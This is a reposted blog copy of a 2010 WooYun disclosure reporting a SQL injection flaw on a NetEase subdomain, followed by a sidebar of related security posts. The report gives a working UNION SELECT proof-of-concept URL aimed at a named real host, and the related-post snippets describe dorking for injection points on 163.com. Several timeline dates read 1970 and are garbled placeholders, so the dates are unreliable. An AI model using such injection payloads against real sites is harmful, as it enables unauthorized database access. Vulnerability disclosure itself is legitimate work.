网易某分站存在注入漏洞

最新推荐文章于 2025-12-18 14:05:38 发布
原创 最新推荐文章于 2025-12-18 14:05:38 发布 · 330 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全 #安全 #hack #wooyun

这篇博客详细记录了网易某分站在2010年7月23日被发现存在注入漏洞的情况。从披露状态来看,该漏洞经过了多个阶段,最终在8月23日对公众公开。漏洞主要涉及数据库注入,攻击者可以通过构造特定URL进行利用。修复方案建议过滤输入变量以防止注入攻击。

漏洞详情

披露状态:

2010-07-23: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-23: 细节向公众公开

简要描述:

网易某分站存在注入漏洞

详细说明:

网易某分站存在注入漏洞

漏洞证明:

http://ps.163.com/type.php?type=3%20and%201=2%20union%20all%20select%20user(),concat(user(),0x3a,database(),0x3a,version())--

修复方案:

过滤变量

Sword-heart
关注
SRC漏洞挖掘之信息收集
悦分享
07-08 1679
在SRC漏洞挖掘或渗透测试中,信息收集占很大一部分,能收集到别人收集不到的资产,就能挖到别人挖不到的洞。项目已整理Gitbook文档,方便阅览:Information Collection Handbook由此项目整理的SRC资产信息收集聚合网站:lovebear.top/info -- SRC信息收集导航知道目标域名之后,我们要做的第一件事情就是获取域名的注册信息,包括该域名的DNS服务器信息和注册人的联系信息等。Whois 查询Whois 简单来说,就是一个用来查询域名是否已经被注册,以及注册域名的详细
端口渗透总结
Coisini的博客
06-13 1455
x00 背景 在前段时间的渗透中,我发现通过端口来进行渗透有时会提升我们的效率,所以才有了这篇文章的诞生; 首先分享一份关于端口及他们对应的服务文件:https://yunpan.cn/cYyNXEpZNYvxQ 访问密码 983e 这里再分享一篇我曾经在百度文库提交的端口渗透文章:请点我 再次看这篇文章发现写的很简单,也只描述了几个常见的端口渗透;而且一般我们都是可以修 改默认端口的,所以平...
网易分站sql注入漏洞
swordheart的博客
04-18 4536
漏洞详情 披露状态: 2010-08-02: 细节已通知厂商并且等待厂商处理中 2010-08-02: 厂商已经确认,细节仅向厂商公开 2010-08-12: 细节向核心白帽子及相关领域专家公开 2010-08-22: 细节向普通白帽子公开 2010-09-01: 细节向实习白帽子公开 2010-09-01: 细节向公众公开 简要描述: 网易分站sql注入漏洞 详细说明: 网易分站sql注入漏洞 漏洞证明: http://b-class.163.com/geren.php?storyID
从163分站sql injection注入漏洞浅谈安全
weixin_33872660的博客
04-17 121
昨天闲的蛋疼 在hao123找了个站,就决定是163了 主站基本没路,找分站。 GOOGLE:site:163.com一会就找到一个叫双喜的分站 继续GOOGLE:site:shuangxi.163.com inurl:.php?id= 找啊找啊找啊找,找到一个sql injection注入点 然后又and 1=1;and 1=2;order by 7,union...
常用的端口攻击
weixin_50464560的博客
07-21 5403
端口渗透总结 0x00 背景   端口渗透过程中我们需要关注几个问题: 1、  端口的banner信息 2、  端口上运行的服务 3、  常见应用的默认端口 当然对于上面这些信息的获取,我们有各式各样的方法,最为常见的应该就是nmap了吧!我们也可以结合其他的端口扫描工具,比如专门的3389、1433等等的端口扫描工具; 服务默认端口 公认端口(Well Known Ports):0-1023,他们紧密绑定了一些服务; 注册端口(Registered Ports):1
pkav漏洞之精华部分
weixin_30731305的博客
04-04 203
  影响巨大的逻辑型漏洞 TOM邮箱任意密码秒改 网易手机邮箱任意密码重置强行绑定 交通银行免费买车漏洞 中国建设银行刷人民币漏洞 腾讯任意QQ号码注册 微信任意用户密码修改漏洞 新浪微搏修改任意用户密码   最有洞察力 手把手教你劫持李开复的腾讯微博 腾讯QQ聊天框XSS QQ客户端文件执行漏洞 当 |XSS蠕虫| 与 |QQ系统消息推送| 双剑合璧 利用数据库...
DVWA中学习PHP常见漏洞及修复方法
weixin_33733810的博客
03-08 319
erevus · 2013/08/14 11:46“安全是一个整体,保证安全不在于强大的地方有多强大 而在于真正薄弱的地方在哪里”--剑心从很多的渗透大型企业内网的案例来看,入侵者大多数是从Web上找到漏洞,从而利用漏洞进一步进行提权,渗透入侵。WooYun: 时代互联上传漏洞多台数据库可控WooYun: 网易某系统未授权访问可导致内网被渗透WooYun: 网易某系统未授权访问续—内网渗透WooY...
端口渗透
weixin_30470643的博客
06-15 1145
端口渗透总结 0x00 背景 端口渗透过程中我们需要关注几个问题: 1、 端口的banner信息 2、 端口上运行的服务 3、 常见应用的默认端口 当然对于上面这些信息的获取,我们有各式各样的方法,最为常见的应该就是nmap了吧!我们也可以结合其他的端口扫描工具,比如专门的3389、1433等等的端口扫描工具; 服务默认端口 公认端口(Well Known Por...
端口的渗透测试总结(转载)
weixin_30417487的博客
03-26 2026
0x00 背景 在前段时间的渗透中,我发现通过端口来进行渗透有时会提升我们的效率,所以才有了这篇文章的诞生; 首先分享一份关于端口及他们对应的服务文件:https://yunpan.cn/cYyNXEpZNYvxQ访问密码 983e 这里再分享一篇我曾经在百度文库提交的端口渗透文章:请点我 再次看这篇文章发现写的很简单,也只描述了几个常见的端口渗透;而且一般我们都是可以修 改默认端口的...
精选资源
杰迅CMS全国城市分站系统
08-29
杰迅CMS全国城市分站系统 杰迅CMS是一款基于TP5.0框架为核心开发的一套免费+开源的城市分站内容管理系统。团队自2013年起自主研发城市分站内容管理系统,5年来,修复升级上千个功能性问题 1、适用场景 城市分站系统...
精选资源
织梦全国多城市分站地区插件(带教程)别轻易尝试_经济_织梦分站_织梦全国分站_全国分站_
09-29
【标题】"织梦全国多城市分站地区插件(带教程)别轻易尝试" 提供的是一个针对织梦(DedeCMS)内容管理系统开发的插件,该插件允许用户构建一个支持全国多城市分站的网站。织梦CMS是一款广泛使用的开源PHP+MySQL的...
pbootcms多城市分站插件,站群SEO搜索引擎优化
05-05
自动生成任意城市的分站链接,同时支持分站之间同页跳转。 配合{city}标签,无需重复添加资料,自动生成带有城市名称的地区关键词,便于SEO针对城市关键词进行优化。
精选资源
dede源码多城市分站插件安装说明.zip
04-22
【标题】"dede源码多城市分站插件安装说明.zip" 提供的是一个针对织梦(DedeCMS)内容管理系统(CMS)的插件,该插件旨在实现多城市分站的功能。织梦(DedeCMS)是一款广泛使用的开源PHP CMS,它允许用户方便地构建...
零基础学习网络安全,如何安排每天的学习计划?需要重点攻克哪些核心技能点?
最新发布
2401_85023633的博客
12-18 486
希望这份学习路径和技能清单能为你扫除迷雾,提供一个清晰的起点。网络安全是一个需要持续学习的领域,保持好奇和动手实践的热情,是成功的最大动力。如果你对某个特定工具或漏洞的学习有更具体的疑问,我们可以继续深入探讨。 源
渗透测试行业术语扫盲(第六篇)—— Web安全专用类术语
qq_39241682的博客
12-09 911
Web是渗透测试的主战场。要在此作战,不仅要懂攻击漏洞(如上一篇所述),更要理解支撑Web运行的基础身份机制、浏览器安全规则以及攻防双方使用的具体工具与载荷。本篇将深入Web安全的“皮下组织”,从维持登录状态的Cookie,到攻击者留下的Webshell,再到防御者的CSP策略,为你揭示这个战场的完整规则与装备图景。
推荐一些适合零基础学习网络安全的具体在线课程或书籍?
2401_85023633的博客
12-18 910
本文提供了一份网络安全学习资源指南,推荐了多种适合不同阶段的在线课程、平台和书籍。课程方面包括新手友好的TryHackMe、实战导向的HackTheBox以及体系化的极客时间课程;书籍推荐涵盖Linux基础、网络原理和Web安全经典著作。学习路径建议从计算机基础开始,逐步过渡到专项学习和实战演练,强调理论与实践相结合。文中还推荐了DVWA靶场和CTF平台等实践资源,帮助学习者循序渐进地掌握网络安全技能。
内网渗透是网络安全渗透测试
2501_93842368的博客
12-18 1036
内网渗透是网络安全渗透测试的核心环节之一,指在(如拿下 Web 服务器、外网主机权限)后,对内部网络进行横向移动、权限提升、信息收集、持久化控制的一系列操作。其知识体系涵盖。
WAP手机卡盟源码分享:打造无限分站
“无限搭分站”是一个很有趣的点,它可能意味着源码提供了一种技术或者商业模式,允许用户搭建多个分站,且分站的数量没有上限。这在某些情况下可能有助于扩展业务,实现服务的快速复制和分布。无限搭分站的特点...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值